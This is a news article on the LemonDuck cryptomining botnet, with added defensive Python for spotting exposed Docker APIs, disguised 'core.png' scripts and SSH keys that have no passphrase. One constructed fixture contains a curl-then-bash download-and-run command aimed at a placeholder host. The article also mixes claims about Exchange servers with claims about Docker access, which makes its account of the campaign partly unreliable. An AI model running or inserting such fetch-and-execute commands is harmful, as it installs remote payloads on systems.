Nasty new botnet exploits Docker containers to mine cryptocurrency


A new botnet made up of compromised Microsoft Exchange servers is mining cryptocurrency for its operators, reports suggest.

According to researchers from security firm CrowdStrike, an unknown threat actor is using the LemonDuck cryptomining botnet to target servers via ProxyLogon.

By looking for exposed Docker APIs for initial access, the attackers are then able to run a malicious container, using a custom Docker ENTRYPOINT to download a “core.png” image file that is actually a disguised Bash script.
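Two of the behaviours described above can be checked for directly on a Docker host: whether the daemon API is reachable over plain TCP, and whether a container's ENTRYPOINT downloads an "image" file and passes it to a shell. The script below is an added example written for this article and is not CrowdStrike's or the article's own code; the daemon.json fragments and the `docker inspect` documents it checks are constructed samples, and `example.invalid` and the container names are placeholders.

```python
"""Defender-side checks for the two Docker behaviours the article describes:
a Docker daemon API exposed over the network (initial access) and a container
ENTRYPOINT that downloads an "image" file and hands it to Bash (core.png).
Added example, not CrowdStrike's or the article's code. The daemon.json
fragments and `docker inspect` documents below are constructed; the host
name example.invalid and the container names are placeholders."""
import re

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"          # first eight bytes of every real PNG
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".bmp", ".ico")
DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
SHELLS = re.compile(r"\b(bash|sh|zsh|dash)\b")


def exposed_api_hosts(daemon_config: dict) -> list:
    """Return 'hosts' entries from daemon.json that serve the API over TCP
    without tlsverify; anyone who can reach that port can start containers."""
    if daemon_config.get("tlsverify", False):
        return []
    return [h for h in daemon_config.get("hosts", []) if h.startswith("tcp://")]


def _image_like(token: str) -> bool:
    path = token.split("?", 1)[0].lower()   # drop any query string first
    return path.endswith(IMAGE_EXTS)


def suspicious_entrypoint(inspect_doc: dict) -> list:
    """Flag an Entrypoint/Cmd that both fetches something with curl/wget and
    invokes a shell while an image-named file is among its arguments.
    Returns the image-named tokens, unique and in order of appearance."""
    cfg = inspect_doc.get("Config") or {}
    argv = list(cfg.get("Entrypoint") or []) + list(cfg.get("Cmd") or [])
    cmdline = " ".join(argv)
    if not (DOWNLOADERS.search(cmdline) and SHELLS.search(cmdline)):
        return []
    hits = [t for t in cmdline.split() if _image_like(t)]
    return list(dict.fromkeys(hits))


def masquerading_image(filename: str, data: bytes) -> bool:
    """True when the name claims PNG but the bytes do not start with the PNG
    signature (a script beginning with a shebang, for instance)."""
    return filename.lower().endswith(".png") and not data.startswith(PNG_MAGIC)


# Constructed samples -------------------------------------------------------
DAEMON_WEAK = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
DAEMON_OK = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
             "tlsverify": True, "tlscacert": "/etc/docker/ca.pem"}
INSPECT_BAD = {"Name": "/placeholder-miner", "Config": {
    "Entrypoint": ["/bin/sh", "-c",
                   "curl -s http://example.invalid/core.png -o /tmp/core.png"
                   " && bash /tmp/core.png"],
    "Cmd": None}}
INSPECT_OK = {"Name": "/placeholder-web", "Config": {
    "Entrypoint": ["nginx", "-g", "daemon off;"], "Cmd": None}}
FAKE_PNG = b"#!/bin/bash\n# constructed stand-in for a disguised script\n"

if __name__ == "__main__":
    print("exposed API hosts:", exposed_api_hosts(DAEMON_WEAK))
    print("suspicious args:", suspicious_entrypoint(INSPECT_BAD))
    print("core.png is a real PNG:", not masquerading_image("core.png", FAKE_PNG))
```

On a live host, feed `exposed_api_hosts` the parsed `/etc/docker/daemon.json` and `suspicious_entrypoint` each element of `docker inspect` output; the `tlsverify` check matters because `tls` alone only encrypts the channel without authenticating clients.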

Mining Monero

After gaining initial access, the attackers are able to carry out a number of actions: abuse EternalBlue, BlueKeep or similar exploits to escalate privileges, install cryptominers, and move laterally across the compromised networks.

They can also install files that allow them to evade detection by any antivirus or malware scanning software installed on the compromised endpoints.

Of all the different cryptominers, the attackers predominantly use XMRig to mine Monero, a privacy-oriented cryptocurrency that is said to be harder to trace.

The researchers further explained that LemonDuck comes with a file called “a.asp”, which is able to disable the aliyun service on Alibaba Cloud and thus evade detection.

On why the campaign was not detected sooner, the researchers noted that the threat actors were not mass-scanning public IP ranges for exploitable attack surfaces, but instead moving laterally through LemonDuck, looking for SSH keys on the filesystem. Once they find SSH keys, they use them to log into the servers and run all of the same malicious scripts.
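The lateral movement described above works because a private key stored without a passphrase can be used as-is by whoever reads it. The audit below, an added example and not CrowdStrike's or the article's code, parses the header of OpenSSH-format and legacy PEM keys to report which ones have no passphrase. The key material in it is constructed (header fields only, no real key data), the paths are placeholders, and `scan_directory()` is the hook for running the same check over a real tree.

```python
"""Audit for SSH private keys that can be reused without a passphrase, the
kind of key the article says LemonDuck collects from the filesystem to log
into further hosts. Added example, not CrowdStrike's or the article's code.
The key material below is constructed (header fields only, no real keys) and
the paths are placeholders; scan_directory() is the hook for a real run."""
import base64
import os
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _pem_body(text: str) -> bytes:
    """Base64-decode the PEM body; trimmed to whole 4-char groups so a
    truncated read still decodes the leading bytes we need."""
    lines = [ln for ln in text.splitlines() if ln and not ln.startswith("-----")]
    b64 = "".join(lines)
    return base64.b64decode(b64[:len(b64) // 4 * 4])


def _read_string(buf: bytes, off: int):
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def key_is_encrypted(text: str):
    """True/False for OpenSSH and PEM private keys, None if unrecognised.
    OpenSSH format: magic, then ciphername; 'none' means no passphrase."""
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        blob = _pem_body(text)
        if not blob.startswith(OPENSSH_MAGIC):
            return None
        cipher, _ = _read_string(blob, len(OPENSSH_MAGIC))
        return cipher != b"none"
    if "BEGIN ENCRYPTED PRIVATE KEY" in text:      # PKCS#8, always encrypted
        return True
    if "PRIVATE KEY-----" in text:                # legacy PEM (RSA/EC/DSA)
        return "Proc-Type: 4,ENCRYPTED" in text
    return None


def find_unprotected_keys(files: dict) -> list:
    """files maps path -> contents; returns paths of passphrase-less keys."""
    return [p for p, txt in sorted(files.items()) if key_is_encrypted(txt) is False]


def scan_directory(root: str) -> list:
    """Walk a real tree (e.g. /home or /root) and apply the same check."""
    found = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    head = fh.read(4096)
            except OSError:
                continue
            if "PRIVATE KEY-----" in head:
                found[path] = head
    return find_unprotected_keys(found)


def _constructed_openssh_key(cipher: str, kdf: str) -> str:
    """Header-only stand-in; a real key continues with kdf options and keys."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    blob = OPENSSH_MAGIC + s(cipher.encode()) + s(kdf.encode())
    b64 = base64.b64encode(blob).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 +
            "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed sample filesystem (placeholder paths) --------------------------
SAMPLE_FS = {
    "/home/placeholder/.ssh/id_ed25519": _constructed_openssh_key("none", "none"),
    "/home/placeholder/.ssh/id_rsa": _constructed_openssh_key("aes256-ctr", "bcrypt"),
    "/root/.ssh/legacy_rsa": ("-----BEGIN RSA PRIVATE KEY-----\n"
                              "Proc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00\n\n"
                              "AAAA\n-----END RSA PRIVATE KEY-----\n"),
    "/home/placeholder/notes.txt": "not a key\n",
}

if __name__ == "__main__":
    for path in find_unprotected_keys(SAMPLE_FS):
        print("no passphrase:", path)
```

Run `scan_directory("/home")` as root to cover every user's `.ssh`; each path it returns is a credential that grants the same access to anyone who can read the file.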

Cryptominers have become highly popular in the past few years, with the rising price of cryptocurrencies and the ease with which they can be sold on the market attracting attention from honest and dishonest actors alike.

Sead Fadilpašić

Sead is a seasoned freelance writer based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for many media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
